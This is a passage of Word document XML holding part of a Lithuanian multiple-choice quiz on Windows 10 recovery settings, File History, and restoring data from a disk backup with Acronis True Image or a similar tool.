          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tada pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atkūrimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="546C1920" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išplėstinė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paleistis</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atidarykite atkūrimo parametrus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01C7F4" w14:textId="538BBF49" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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B) Paspausdami klaviatūros „Windows“ logotipo klavišą</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">+ L atidarykite langą </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. Jei nepavyko, pasirinkite mygtuką </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Pradžia</w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> tada pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Parametrai</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Naujinimas ir sauga</w:t>
      </w:r>
      <w:r w:rsidR="7BF3B5EC" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atkūrimas</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;</w:t>
      </w:r>
      <w:r w:rsidR="0B277CB6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Išplėstinė</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> paleistis</w:t>
      </w:r>
      <w:r w:rsidR="00857251" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Atidarykite atkūrimo parametrus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0CF363" w14:textId="0F054448" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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 xml:space="preserve">C) Užduočių juostos ieškos laukelyje įveskite </w:t>
      </w:r>
      <w:r w:rsidR="00760AD6" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tkurti failus ir pasirinkite Atkurti failus naudojant failų retrospektyvą. Suraskite pageidaujamą failą ir naudodami rodykles peržiūrėkite visas jo versijas.</w:t>
      </w:r>
      <w:r w:rsidR="436FBE6A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Radę norimą versiją, pasirinkite </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Atkurti</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>, kad įrašytumėte ją pradinėje vietoje.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEFAED4" w14:textId="77777777" w:rsidR="00F0758D" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2458A1" w14:textId="7FDD20A7" w:rsidR="005D53E4" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>Kaip panaudoti Acronis True Image</w:t>
      </w:r>
      <w:r w:rsidR="6679FE6A" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="152CB88D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">arba lygiavertį </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve">įrankį informacijai </w:t>
      </w:r>
      <w:r w:rsidR="00BB13CE" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>atkurti</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:eastAsia="x-none"/>
        </w:rPr>
        <w:t>iš atsarginės disko kopijos?</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D563102" w14:textId="36CEE6CD" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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A)</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Galima </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>naudoti USB pakrovimo atmin</w:t>
      </w:r>
      <w:r w:rsidR="004C261D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tinę</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> su Acronis True Image</w:t>
      </w:r>
      <w:r w:rsidR="4B996BCD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> arba</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> su</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4B996BCD" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>lygiaverčiu</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> įrankiu arba paleisti įrankį per operacinės sistemos programos meniu</w:t>
      </w:r>
      <w:r w:rsidR="000503B4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F06954" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>,Prad</w:t>
      </w:r>
      <w:r w:rsidR="00660DD0" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>žia</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA31B45" w14:textId="5463BEA1" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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 xml:space="preserve">B) </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Reikia </w:t>
      </w:r>
      <w:r w:rsidR="000438B7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="007C4CBB" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ai</w:t>
      </w:r>
      <w:r w:rsidR="001D3929" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">inti </w:t>
      </w:r>
      <w:r w:rsidR="009D3E2E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>skaidinius</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="004151A9" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>angl</w:t>
      </w:r>
      <w:r w:rsidR="001344E7" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. - </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>partition) ir kurti naujus</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E28036" w14:textId="39C037C2" w:rsidR="6ACD6CA6" w:rsidRPr="005A5C28" w:rsidRDefault="7AA0694E"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C)</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Reikia n</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>audoti</w:t>
      </w:r>
      <w:r w:rsidR="005D53E4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="001D3929" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>paleid</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>imo USB Flash atmint</w:t>
      </w:r>
      <w:r w:rsidR="004C261D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ine</w:t>
      </w:r>
      <w:r w:rsidR="00C3025B" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0091A784" w14:textId="77777777" w:rsidR="00F0758D" w:rsidRPr="005A5C28" w:rsidRDefault="00F0758D" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
